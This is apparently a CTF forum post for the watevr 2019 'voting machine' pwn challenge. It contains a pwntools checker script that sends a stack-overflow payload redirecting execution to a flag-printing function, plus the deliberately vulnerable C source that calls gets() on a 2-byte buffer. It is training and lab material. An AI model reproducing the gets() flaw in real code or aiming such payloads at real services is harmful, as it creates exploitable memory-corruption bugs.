
[Pwn] watevr_2019_pwn-voting-machine-1

发表于 2020-5-1 19:16:06 | 显示全部楼层 |阅读模式
# This challenge is based on a simple buffer overflow (BOF) in gets(input), which can later be used to redirect code execution.
from pwn import *
import time

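def main(ip, port, flag):
    """Check that the voting-machine service still returns the expected flag.

    Connects to ``ip:port``, sends the overflow input for the challenge's
    ``gets(input)`` call and looks for ``flag`` in the reply. The process
    exits with status 0 when the flag is found, and with status 1 when it is
    missing or when the connection or exchange raises an exception.

    Args:
        ip: Host name or address of the challenge service.
        port: TCP port of the challenge service.
        flag: Expected flag text.
    """
    conn = None
    try:
        conn = remote(ip, port)
        # 10 filler bytes, then the address 0x0000000000400807
        # (super_secret_function) in little-endian order, zero-padded.
        # Sent as a bytes literal so the bytes on the wire do not depend on
        # an implicit str-to-bytes conversion inside the client library.
        conn.sendline(b"A" * 10 + b"\x07\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

        response = b""
        time.sleep(4)  # wait before reading so the service has time to reply
        response += conn.recv()
        print("Response: " + str(response))
        # Compare raw bytes. str(response) is the b'...' repr, which escapes
        # quotes, backslashes and non-ASCII bytes, so a flag containing any
        # of those would never match even when the service returned it.
        if flag.encode() in response:
            print("Correct")
            exit(0)
        else:
            print("Incorrect")
            exit(1)
    except Exception as e:
        print("fail due to ")
        print(e)
        exit(1)
    finally:
        # exit() raises SystemExit, so this runs on every path and the
        # connection is closed instead of being left to interpreter shutdown.
        if conn is not None:
            conn.close()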

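#Validation section
# Read the expected flag and the service address, then run the check.
flag = input("Flag: ").replace("\n", "")
# Split on the last colon only, so a host that itself contains colons
# (for example an IPv6 literal) still parses as host plus port.
ip, port = input("service: ").rsplit(":", 1)
main(str(ip), int(port), str(flag))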
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <unistd.h>
#include <signal.h>

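/*
 * Print the contents of /home/ctf/flag.txt to stdout, then exit.
 *
 * Exits with status 1 (after printing a message) if the file cannot be
 * opened, and with status 0 once the whole file has been printed.
 * No code shown in this file calls this function.
 */
void super_secret_function(){
  FILE *f;
  /* fgetc() returns int. Storing it in a char either makes a 0xFF byte
     compare equal to EOF (signed char) or makes EOF unreachable
     (unsigned char), so the loop variable must be int. */
  int c;
  f = fopen("/home/ctf/flag.txt", "r");
  if(f == NULL){
      printf("Cannot open flag.txt\n");
      exit(1);
  }
  while((c = fgetc(f)) != EOF){
      putchar(c);
  }
  fclose(f);
  exit(0);  /* exit() flushes stdout, so the printed file reaches the client */
}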

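/*
 * SIGALRM handler: end the process when the alarm armed in main() fires.
 *
 * Uses _exit() instead of exit(). exit() runs atexit handlers and flushes
 * stdio, neither of which is async-signal-safe, so calling it from a handler
 * that interrupts a stdio call (main() blocks in one) is undefined behaviour.
 */
void sig(int sign){
        (void)sign;  /* the signal number is not used */
        _exit(0);
}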

/*
 * Entry point of the voting service: arms a 40-second alarm, prints a
 * banner, reads one "vote" line from stdin and prints a thank-you message.
 *
 * NOTE(review): the code is left exactly as published because the page's
 * header comment describes the gets(input) overflow as the basis of the
 * challenge. In code that is not meant to be vulnerable, replace gets()
 * (removed from the C standard in C11) with a bounded read such as
 * fgets(input, sizeof input, stdin) and size the buffer for the longest
 * valid answer plus the terminating NUL.
 */
int main(){
  signal(SIGALRM, sig);
  alarm(40);  /* SIGALRM is delivered after 40 seconds; sig() then ends the process */
  /* Two bytes hold one character plus the terminating NUL. The prompt below
     accepts "10", which already needs three bytes. */
  char input[2];
  /* \e is a compiler extension for ESC; the SGR codes 3 and 23 switch italics on and off */
  printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
  printf("Today's vote will be regarding the administration of\n");
  printf("watevr CTF.\n");
  printf("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.\n");
  printf("Thanks!\n");
  printf("Vote: ");
  fflush(stdout);  /* the prompt has no newline, so flush it before blocking on input */
  /* gets() takes no length argument: it copies the whole input line into
     `input`, so any line longer than one character writes past the end of
     the 2-byte buffer into adjacent stack memory. */
  gets(input);
  printf("Thanks for voting!\n");
  return 0;
}

